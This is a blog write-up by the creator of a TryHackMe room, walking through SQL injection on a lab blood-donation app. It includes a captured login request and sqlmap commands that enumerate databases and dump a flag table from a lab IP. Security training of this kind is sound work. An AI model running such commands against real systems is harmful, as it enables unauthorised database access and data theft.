• Home
  • Contact

NARESH LAMGADE

TryHackMe : SQLMAP Writeup

authorNaresh LamGade
16th May, 2021
TryHackMe

Featured Posts

  • TryHackMe : SQLMAP Writeup
    TryHackMe : SQLMAP Writeup
    16th May, 2021
  • Payment Bypass on Mega Business
    Payment Bypass on Mega Business
    5th June, 2020
  • Dynamic Execution : ASP.NET with Bootstrap
    Dynamic Execution : ASP.NET with Bootstrap
    28th April, 2017

Categories

blog bug bugs security Tech Tips & Trick TryHackMe tutorial Uncategorized

Naresh LamGade

authorNaresh LamGade
16th May, 2021
TryHackMe

 

This is my first ever TryHackMe room creation experience and it was fun as well. This is an official write-up for my own room ‘sqlmap’.

Room Link: https://tryhackme.com/room/sqlmap or https://tryhackme.com/jr/sqlmap  

Sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, over data fetching from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Installing Sqlmap

If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap

Let’s jump into the challenge now.

Deploy the machine attached to this task, then open up the machine IP via browser .(this machine can take up to 3 minutes to boot)

 

At first, you will notice the default nginx page, so we need to brute force the hidden directory

Before start brute-forcing, note the task hint. It says blood donation application so by mean we can predict some hidden directory.

hint

Start to brute force or try randomly to find out the directory name.

Hidden directory is : /blood/

Once you find out the directory, let’s go to the application.

home_page

 

It’s a simple application that will record blood donation records.

There are multiple vulnerable endpoints,

  1. Login Page.

point_2

 

Login is vulnerable to POST-based SQL Injection. You need to store the post request in a file and start to attack using sqlmap.

POST /blood/auth.php HTTP/1.1 
Host: 192.168.147.130 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.147.130/blood/login.php 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 27 
Connection: close 
Cookie: PHPSESSID=hds2oibv9v25aj5is3fsb1el91 
Upgrade-Insecure-Requests: 1 
 
username=nare&password=nare

Lets jump into the sqlmap.

Here is the command,

sqlmap -r req.txt -p username --dbs

2.  URL Based – GET Based

point_3_sql

 

 

Here, we have a simple GET based

sqlmap -u http://192.168.147.130/blood/view.php?id=1 --dbs

Here we have used two flag -u to state the vulnerable URL and –dbs to enumerate the database.

 

available_db

 

We get the available database details. We are more interested in ‘blood‘ database. Now lets retrieve the tables from the blood database.

 

sqlmap -u http://192.168.147.130/blood/view.php?id=1 -D blood –tables

tables

 

Now once we retrieve the table, we can see the flag table, lets dump the columns.

sqlmap -u http://192.168.147.130/blood/view.php?id=1  -D blood -T flag --columns

flag_table

 

Now let’s dump this flag table to retrieve our flag.

sqlmap -u http://192.168.147.130/blood/view.php?id=1 --dbms=mysql  -D blood -T flag --dump

 

flag

 

Once you dump the flag table, you can see the flag.

flag: thm{XXXXXXXXXX}

 

Give it a try and find out yourself. It’s a simple room with a simple challenge. Hope this will be helpful.

 

 

Comments




Share

Twitter Facebook Google+




Payment Bypass on Mega Business
author Naresh LamGade 5th June, 2020
Dynamic Execution : ASP.NET with Bootstrap
author Naresh LamGade 28th April, 2017
There are no comments.

Leave a Reply
Cancel Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Navigation
  • Home
  • Contact
Copyright © Naresh LamGade. 2023 • All rights reserved.
Proudly published with WordPress.